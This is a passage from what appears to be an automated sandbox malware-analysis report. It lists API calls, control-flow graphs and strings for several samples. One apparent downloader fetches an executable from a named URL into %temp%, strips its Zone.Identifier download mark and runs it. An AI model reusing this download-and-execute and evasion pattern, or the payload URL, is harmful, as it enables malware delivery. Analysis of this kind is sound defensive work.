                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00551144
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0055115A
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00551189
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 005511B8
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 005511EB
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0055121C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0055122B
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00551244
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 00551254
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00551270
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0055127D
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0055128A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 00551238
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 00551155
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 00551138
                                                                                                                                                                                                                                                    • %temp%, xrefs: 005510DB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_550000_1171111125.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 770025858-111153409
                                                                                                                                                                                                                                                    • Opcode ID: 9d8f2fddd8e9112f9b311f9b778e9278909308d22967104a3878eaa4e1e00838
                                                                                                                                                                                                                                                    • Instruction ID: d56daf293e68610f541c3180ac47196ca70eadc169d58bd5c01ec9b44ffddba5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d8f2fddd8e9112f9b311f9b778e9278909308d22967104a3878eaa4e1e00838
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D341F8B1D01714ABEB24DB60CC5DFDA7B79BB98702F0044D5F609A21D0DA74AA88CF54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 12 551000-551060 memset * 2 CreateProcessW 13 551071-551095 ShellExecuteW 12->13 14 551062-55106f Sleep 12->14 16 551097-5510a4 Sleep 13->16 17 5510a6 13->17 15 5510a8-5510ab 14->15 16->15 17->15
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 0055100E
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 0055101E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00551057
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 00551067
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00551082
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0055109C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_550000_1171111125.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$open
                                                                                                                                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                                                                                                                                    • Opcode ID: 32668efbcaa30f72ea0185bf1ff4bcac33d4c19ddd1404d3ef35bdb83fa66ad6
                                                                                                                                                                                                                                                    • Instruction ID: b329049176fbbe217f6efeb03f31edf77a172dd0531bef8eb06906e73ce915a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32668efbcaa30f72ea0185bf1ff4bcac33d4c19ddd1404d3ef35bdb83fa66ad6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22115471A41308BBEB10DF90CC5AFDE7B74BB55B02F100115FB056E1D0D6B1AA48DB59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 18 5512a0-5512eb ExpandEnvironmentStringsW wsprintfW 20 5512f3-55131c CreateFileW 18->20 21 5512ed-5512ef 18->21 23 55131e-551325 CloseHandle 20->23 24 55132b 20->24 22 55132d-551330 21->22 23->24 24->22
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005512BA
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 005512D3
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 005512E3
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00551309
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00551325
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_550000_1171111125.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\g76876868687587f.txt$%temp%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 750032643-811463184
                                                                                                                                                                                                                                                    • Opcode ID: b4dd09e9e522750148d7d95dbd908b3c07775cad694d498fd279456ca2e8789b
                                                                                                                                                                                                                                                    • Instruction ID: f8aebddfdefe786f7c56b6f6e406f02212d43feb359ce222c878a6c1844b4743
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4dd09e9e522750148d7d95dbd908b3c07775cad694d498fd279456ca2e8789b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901F7B890030CABD7209B60DC5EFE57B38BB05702F008595AB15950E1D6705ACCDFA5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 25 551340-551358 Sleep call 5512a0 28 551381-551384 25->28 29 55135a-551379 GetTickCount srand Sleep call 5510b0 25->29 31 55137e 29->31 31->28
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00551348
                                                                                                                                                                                                                                                      • Part of subcall function 005512A0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005512BA
                                                                                                                                                                                                                                                      • Part of subcall function 005512A0: wsprintfW.USER32 ref: 005512D3
                                                                                                                                                                                                                                                      • Part of subcall function 005512A0: PathFileExistsW.KERNELBASE(?), ref: 005512E3
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0055135A
                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 00551361
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000E30D0), ref: 0055136E
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: GetTickCount.KERNEL32 ref: 005510B9
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: srand.MSVCR90 ref: 005510C0
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005510E0
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: strlen.MSVCR90 ref: 005510EA
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: mbstowcs.MSVCR90 ref: 00551101
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: rand.MSVCR90 ref: 00551109
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: rand.MSVCR90 ref: 0055111D
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: wsprintfW.USER32 ref: 00551144
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0055115A
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00551189
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 005511B8
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 005511EB
                                                                                                                                                                                                                                                      • Part of subcall function 005510B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0055121C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • http://twizt.net/rh.exe, xrefs: 00551374
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_550000_1171111125.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internet$CountEnvironmentExpandOpenSleepStringsTickrandsrandwsprintf$CreateExistsPathReadWritembstowcsstrlen
                                                                                                                                                                                                                                                    • String ID: http://twizt.net/rh.exe
                                                                                                                                                                                                                                                    • API String ID: 2330660114-139602931
                                                                                                                                                                                                                                                    • Opcode ID: 8a96303cb2835c4e79c77334f26333b47456378293339849837e527b495da44f
                                                                                                                                                                                                                                                    • Instruction ID: 81014e7116870a1368b7abd83ac44c629d50a7197099ffa18a256ef4bfd1a1ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a96303cb2835c4e79c77334f26333b47456378293339849837e527b495da44f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53D08C7691120127920033E26C3E71B3E687B61793F400422B905D04E2ED40900CA3AB

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 f73a48-f73a54 1 f73ae6-f73ae9 0->1 2 f73aef 1->2 3 f73a59-f73a6a 1->3 4 f73af1-f73af5 2->4 5 f73a77-f73a90 LoadLibraryExW 3->5 6 f73a6c-f73a6f 3->6 7 f73af6-f73b06 5->7 8 f73a92-f73a9b GetLastError 5->8 9 f73a75 6->9 10 f73b0f-f73b11 6->10 7->10 14 f73b08-f73b09 FreeLibrary 7->14 12 f73ad4-f73ae1 8->12 13 f73a9d-f73aaf call f70ab8 8->13 11 f73ae3 9->11 10->4 11->1 12->11 13->12 17 f73ab1-f73ac3 call f70ab8 13->17 14->10 17->12 20 f73ac5-f73ad2 LoadLibraryExW 17->20 20->7 20->12
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00F73B57,00F743DB,?,00000000,00000000,00000000,?,00F73CD0,00000022,FlsSetValue,00FB4078,00FB4080,00000000), ref: 00F73B09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 7eaccc2e1fb20d8fbbe85f012629e017b7e82d6ff0e7f6180ce5be61001556e4
                                                                                                                                                                                                                                                    • Instruction ID: 6e2e5cb6ccb0f226088ad385a0491db3239f3e829f11b6ecb0b981aeb62c5036
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eaccc2e1fb20d8fbbe85f012629e017b7e82d6ff0e7f6180ce5be61001556e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60212B35F04215BBD7219B24DC82AAA7768DB41770F154212ED4AB7290DB78EE00FBD2

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 21 f6befa-f6bf67 GetProcessHeap HeapAlloc 22 f6bfd6-f6bfe2 21->22 23 f6bf69-f6bf82 call f6bfeb 21->23 24 f6bfe4-f6bfe8 22->24 25 f6bfb3-f6bfc2 22->25 31 f6bfa4-f6bfac 23->31 27 f6bfc4-f6bfce VirtualFree 25->27 28 f6bfd0 25->28 27->28 30 f6bfd1-f6bfd4 HeapFree 28->30 30->22 32 f6bf84-f6bf93 31->32 33 f6bfae-f6bfb1 31->33 34 f6bf95-f6bf9b 32->34 35 f6bf9e-f6bfa2 HeapFree 32->35 33->30 34->35 35->31
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00F6BF03
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00040000), ref: 00F6BF56
                                                                                                                                                                                                                                                      • Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 00F6BFA2
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000100,00000000,00008000), ref: 00F6BFCE
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00FBB188), ref: 00F6BFD4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • @vTyueNpvINw-5eXXzoHaGMEix7w2VuIQqHtVQw7HCBpD3mLxOoAZKX7ugM3fwt2HzPvhq1atw2GpKhcT8dvXOe|idUmje-sVhkfaEMVfuTcflxHDoSLl|aBjLiweN-yx1OqUC|nReX4WqAX53TGPylOAjV2g0JjHNKTOhfuMne7eSn8ymLWnYb55M|chAaG|Tu|jWOsu|kAsKsaj640DOd9CBO9ppLr8uZUOSa0iay9KREERTTJOZG014|GTHpX9WBV, xrefs: 00F6BF36
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Free$Alloc$ProcessVirtual
                                                                                                                                                                                                                                                    • String ID: @vTyueNpvINw-5eXXzoHaGMEix7w2VuIQqHtVQw7HCBpD3mLxOoAZKX7ugM3fwt2HzPvhq1atw2GpKhcT8dvXOe|idUmje-sVhkfaEMVfuTcflxHDoSLl|aBjLiweN-yx1OqUC|nReX4WqAX53TGPylOAjV2g0JjHNKTOhfuMne7eSn8ymLWnYb55M|chAaG|Tu|jWOsu|kAsKsaj640DOd9CBO9ppLr8uZUOSa0iay9KREERTTJOZG014|GTHpX9WBV
                                                                                                                                                                                                                                                    • API String ID: 3808331028-205222976
                                                                                                                                                                                                                                                    • Opcode ID: da68225fcfec134c8fd8d9451ae00da1071b16a447f748c41a2506d294de805f
                                                                                                                                                                                                                                                    • Instruction ID: ec3a6ce83d7b5b6f1c222eb7c451ab4878e2dc316d98997876815b5d89a9dba0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da68225fcfec134c8fd8d9451ae00da1071b16a447f748c41a2506d294de805f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56311671D00209AFCB10DFA9DC80BAEBBF4FB48710F108129E555E7260D775A945EF94

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F79314
                                                                                                                                                                                                                                                      • Part of subcall function 00F79098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
                                                                                                                                                                                                                                                      • Part of subcall function 00F79098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F79366
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00F793C0
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F793F3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                    • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                    • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                    • Instruction ID: 58e8c73032faa5c8acf50d594783a6317877b99d5e6ce9cf1b80596e3775aa58
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51FA75900609AFCB20DFA9CC81A9EBBF8FF08354F10C51AF959A7240D3B0E951DBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F79314
                                                                                                                                                                                                                                                      • Part of subcall function 00F79098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
                                                                                                                                                                                                                                                      • Part of subcall function 00F79098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F79366
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00F793C0
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F793F3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000003.1602457648.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F79000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_3_f79000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                    • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                    • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                    • Instruction ID: 58e8c73032faa5c8acf50d594783a6317877b99d5e6ce9cf1b80596e3775aa58
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51FA75900609AFCB20DFA9CC81A9EBBF8FF08354F10C51AF959A7240D3B0E951DBA5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 61 f70ba2-f70bbb 62 f70bd1-f70bd6 61->62 63 f70bbd-f70bcd call f74c61 61->63 64 f70be3-f70c09 call f72b21 62->64 65 f70bd8-f70be0 62->65 63->62 70 f70bcf 63->70 71 f70d7f-f70d90 call f6cfb5 64->71 72 f70c0f-f70c1a 64->72 65->64 70->62 73 f70d72 72->73 74 f70c20-f70c25 72->74 78 f70d74 73->78 76 f70c27-f70c30 call f789a0 74->76 77 f70c3e-f70c49 call f73511 74->77 76->78 86 f70c36-f70c3c 76->86 77->78 88 f70c4f 77->88 81 f70d76-f70d7d call f70dda 78->81 81->71 89 f70c55-f70c5a 86->89 88->89 89->78 90 f70c60-f70c75 call f72b21 89->90 90->78 93 f70c7b-f70c8d call f73d41 90->93 95 f70c92-f70c96 93->95 95->78 96 f70c9c-f70ca4 95->96 97 f70ca6-f70cab 96->97 98 f70cde-f70cea 96->98 97->81 99 f70cb1-f70cb3 97->99 100 f70d67 98->100 101 f70cec-f70cee 98->101 99->78 103 f70cb9-f70cd3 call f73d41 99->103 102 f70d69-f70d70 call f70dda 100->102 104 f70d03-f70d0e call f73511 101->104 105 f70cf0-f70cf9 call f789a0 101->105 102->78 103->81 116 f70cd9 103->116 104->102 115 f70d10 104->115 105->102 114 f70cfb-f70d01 105->114 117 f70d16-f70d1b 114->117 115->117 116->78 117->102 118 f70d1d-f70d35 call f73d41 117->118 118->102 121 f70d37-f70d3e 118->121 122 f70d40-f70d41 121->122 123 f70d5f-f70d65 121->123 124 f70d42-f70d54 call f72bdb 122->124 123->124 124->102 127 f70d56-f70d5d call f70dda 124->127 127->81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F70C27
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F70CF0
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F70D57
                                                                                                                                                                                                                                                      • Part of subcall function 00F73511: HeapAlloc.KERNEL32(00000000,00F72586,00F743DB,?,00F72586,00000220,?,?,00F743DB), ref: 00F73543
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F70D6A
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F70D77
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
